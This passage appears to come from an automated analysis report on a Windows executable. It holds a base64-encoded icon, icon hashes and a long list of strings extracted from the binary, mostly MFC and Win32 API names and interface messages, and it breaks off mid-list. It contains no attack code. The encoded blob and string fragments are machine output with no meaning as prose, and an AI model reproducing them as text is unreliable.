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", + "icon_hash": "a94160d895e7a82b0c889b88e8ca3677", + "icon_fuzzy": "d8615c8b25257d51009f8afbdfb7c18d", + "icon_dhash": "71e4cae1b29ef061", + "imported_dll_count": 11 + }, + "data": null, + "strings": [ + "KERNEL32.dll", + "CCCr,,,", + "SystemTimeToFileTime", + "WaitMessage", + ":bwn?", + ".?AV?$IAccessibleProxyImpl@VCAccessibleProxy@ATL@@@ATL@@", + ".?AV?$CMFCComObject@VCAccessibleProxy@ATL@@@@", + "accValue", + "FpPj:", + ">>>>,,,", + "GDI32.DLL", + "InitializeCriticalSectionAndSpinCount", + " h(((( H", + "QQSVWd", + "ImageList_GetImageInfo", + ".?AUCThreadData@@", + "CPrintDialog", + "_except_handler4_common", + "#32768", + "lstrlenA", + "u|0c-", + "StringFileInfo", + "Thursday", + "FtPj;", + "CUIntArray", + ".?AVCException@@", + ";|$$t", + "aYmXa6qcjVMGO6ggef5CzKefdcOotAXtAjWC9yKJluSDZWpq7fVQRxqZM", + "GetTextExtentPoint32A", + " \"%1\"", + "GetTempFileNameA", + "kernel32.dll", + "SetWindowPos", + "GetMenuCheckMarkDimensions", + "CLSIDFromString", + "Sunday", + "german-lichtenstein", + "PSSSSS", + "RegCreateKeyA", + "6.1.7600.16385", + "tf9|$$t6V", + "WideCharToMultiByte", + "CoTaskMemAlloc", + ".?AVCPtrList@@", + "GetProcessWindowStation", + "u@9F|t", + "_^][Y", + "uuu^jjj", + "dddd, MMMM dd, yyyy", + "CHeaderCtrl", + "!This program cannot be run in DOS mode.", + "t.;t$$t(", + "C`+CX", + "December", + "Please enter a currency.", + "BitBlt", + "GetClassInfoA", + ".?AVCFrameWnd@@", + ".?AUISequentialStream@@", + "HtRHH", + "3p!gH", + "BeginDeferWindowPos", + "7f=W3", + "NoRecentDocsHistory", + "CWinApp", + "DPtoLP", + "Save As", + "EndDoc", + "QQSVW", + "GE-bv", + "accHelp", + "First Help", + "DOMAIN error", + "australian", + "_]^[Y", + "commdlg_FindReplace", + "@_^[]", + "kwItC", + "=sRRj", + "E SSSS", + "CreateFontIndirectA", + "Invalid DateTime", + "english-jamaica", + "GetNextDlgTabItem", + "GetFileTitleA", + "~c:d<", + "tlSj VW", + "RegSetValueA", + "GetActiveWindow", + "OOO$>>>D>J>P>V>\\>c>j>q>x>", + "chinese-simplified", + ".?AV_AFX_BASE_MODULE_STATE@@", + "OH;Alt", + "ppp+fff", + "9=XAH", + "Ph_^[", + "SetScrollInfo", + ".?AVCWindowDC@@", + "Venezuela", + "GetModuleFileNameA", + ".?AUIAccessibleProxy@@", + "CImageList", + "NTDLL.DLL", + "ole32.dll", + "January", + "CListBox", + "RegisterClassA", + "95|+H", + "@PVSS", + "Ecuador", + "ReuseDDElParam", + "MoveToEx", + "Disk full while accessing %1..An attempt was made to access %1 past its end.", + "C*PjTVj", + "CPalette", + "FileTimeToLocalFileTime", + "SuspendThread", + "FileDescription", + "WriteFmtUserTypeStg", + "-64OS", + ".?AVCFileException@@", + "ReleaseStgMedium", + "NoDrives", + ".?AVCPrintDialog@@", + "Please enter a date.", + "GetDeviceCaps", + "HeapFree", + "CreateThread", + "Expanding Checkbox Test", + "MM/dd/yy", + "62O;O", + "y*fS ", + "t$<\"u", + "DeleteFileA", + "f95h+H", + "/-2QT", + "opC#=", + "ShowScrollBar", + "atxHtfHt'Ht", + "ecs:}", + "Object type", + "GlobalFlags", + "Untitled", + "GetMessagePos", + "<6X_Zq1", + "MonitorFromPoint", + "( ", + "A security error of unknown cause has been detected which has", + "spanish-honduras", + "CPageSetupDialog", + "accDescription", + "tCNun", + ".?AUIOleWindow@@", + "SetLastError", + "spanish-paraguay", + "F4Pj/", + "G;~$|", + "t>IIt", + "YVYhQ", + "united-states", + "Software", + "CreatePatternBrush", + "StringFromCLSID", + "GetDlgItem", + "ExitProcess", + "HeapDestroy", + "C4+C,", + "j,h /", + "CreateStdAccessibleObject", + "spanish-venezuela", + "spanish-el salvador", + "P{A_= *", + "JJJ>666", + "commdlg_ShareViolation", + "rasctrs.dll", + "america", + "Y7ywG9Uz", + "rrroaaa", + "ConvertDefaultLocale", + "t@j\\P", + "GetCapture", + "french-swiss", + "P\\_^[", + "Wednesday", + "SetStdHandle", + "Ttl},", + "PtInRect", + "F\\PjM", + "RtlUnwind", + "- not enough space for _onexit/atexit table", + "VVVVVUWUUj", + "GlobalSize", + "NoPlacesBar", + "Escape", + "commdlg_help", + "GetShortPathNameA", + "Da:(i", + "HSVWj", + "corrupted the program's internal state. The program cannot safely", + "Panama", + "d^2G{", + "LC_ALL", + "spanish-chile", + "l!i60", + ">#>)>/>5>;>A>G>M>S>Y>_>e>k>q>w>}>", + "iyi!\\D\\AZwH", + "No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.", + "YYt+V", + "V@+V8", + "EnumChildWindows", + "SetEnvironmentVariableA", + "222F(((", + ".PAVCFileException@@", + "spanish-bolivia", + "ImageList_Create", + "Software\\", + "EndPaint", + "39qPtw", + "RICHED32.DLL", + "t}VWP", + "GetClientRect", + "MapVirtualKeyA", + "F,Pj-", + "+t\"HHt", + "GetCursorPos", + "EnumSystemLocalesA", + "Monday", + "iiikaaa", + "[printto(\"", + "CDocManager", + "@uESW", + "GetBkColor", + "WPPWV", + "t7Ht$HHt", + "GetStringTypeA", + "FxPj<", + "tBHt0", + "GetLayout", + "GetKeyNameTextA", + "l%X/CY", + "Spain", + "t%<.u(", + "R6019", + "CreateRectRgnIndirect", + "CreateEventA", + "GetTimeFormatA", + "hhhzOOO", + "GetSysColor", + "PPPPWSP", + "Please select a button.*Please enter an integer between 0 and 255. Please enter a positive integer. Please enter a date and/or time.", + "SetViewportOrgEx", + "Recent File List", + ".?AVCArchiveStream@@", + "IsWindowVisible", + "GetStringTypeExW", + "MSWHEEL_ROLLMSG", + "C*CQC", + "SetArcDirection", + ".?AVCNewTypeDlg@@", + ":%;q;w;};", + "USER32", + "iiiJOOO", + ";D$$t", + "OpenServiceA", + "spanish-uruguay", + ".?AVCComObjectRootBase@ATL@@", + "F,+F(_;E", + ">:u>FV", + "- not enough space for lowio initialization", + "9p tm", + "english-american", + "SetTextCharacterExtra", + "SetRectEmpty", + "PreviewPages", + "SetFileSecurityA", + "spanish-modern", + "?9ulu:", + "?$,eC", + ".?AVCStatic@@", + "HVtAHtXHuU", + "+C`+E", + "QQSVWjd", + "JJJ4666", + "1FF;E", + "PWVWWW", + "Please enter a time.", + "t9WWh", + "FreeLibrary", + "FileTimeToSystemTime", + "WriteFile", + "RegQueryValueA", + "@.data", + "FXPjL", + "accKeyboardShortcut", + "COleException", + ";Q<]>>8", + "Please contact the application's support team for more information.", + "PathStripToRootA", + "SysTabControl32", + "ReleaseCapture", + "UUUUW", + "eee@RRR", + "CreateBitmap", + "#Unable to load mail system support.", + "LC_MONETARY", + "SECURITY", + "DestroyMenu", + "KiXt$", + "RasPortGetBundle", + "SetFileTime", + "CDocument", + "InsertMenuA", + "CopyMetaFileA", + "LISTBOX", + "english-nz", + "8)8A8V8[8a8y8~8", + "south korea", + "te<%t4", + "SetStretchBltMode", + "F`PjN", + "RectVisible", + "SetMapMode", + "GetDesktopWindow", + "united-kingdom", + "z@`?}{", + "VVVjH", + "EndDeferWindowPos", + "EventLogLevel", + "t;=$'H", + "Q\\_^]", + "PPPPj", + "great britain", + "swiss", + "CreateRectRgn", + "FFFN@@@", + "CreateCompatibleBitmap", + ".?AV_AFX_EDIT_STATE@@", + "CSliderCtrl", + "Argentina", + "GDI32.dll", + "SVWj(3", + "GetCurrentProcess", + ".?AVCFindReplaceDialog@@", + "accSelection", + "NoBackButton", + "IsWindowEnabled", + "VirtualFree", + "ImageList_LoadImageA", + "CompareStringA", + "C,PjVVj", + "2 CFE", + "QSVW3", + "R6016", + "LocalFileTimeToFileTime", + "G.PUU", + "CheckDlgButton", + ".?AVCResourceException@@", + "MoveWindow", + "tPPQ+", + ".?AVCButton@@", + ";M |%", + "DeleteMenu", + "Afx:%p:%x:%p:%p:%p", + "GetWindowTextA", + ".?AVCCtrlView@@", + ".PAVCUserException@@", + "],Q=5", + "CMapPtrToPtr", + "GetMapMode", + "VVVr>>>", + ".idata", + "FTPjK", + "ScrollWindowEx", + "YYtMf", + "k9~8uDj", + "CUserException", + "Dispatch exception: %1", + "commctrl_DragListMsg", + "^8tr9p@u", + "SelectObject", + "t,HuDh", + "czech", + "Failed to save document.", + "ShowWindow", + "OpenPrinterA", + "VwltB", + ".?AVCEdit@@", + "SetHandleCount", + "SendMessageA", + "PolyDraw", + "GetWindowPlacement", + 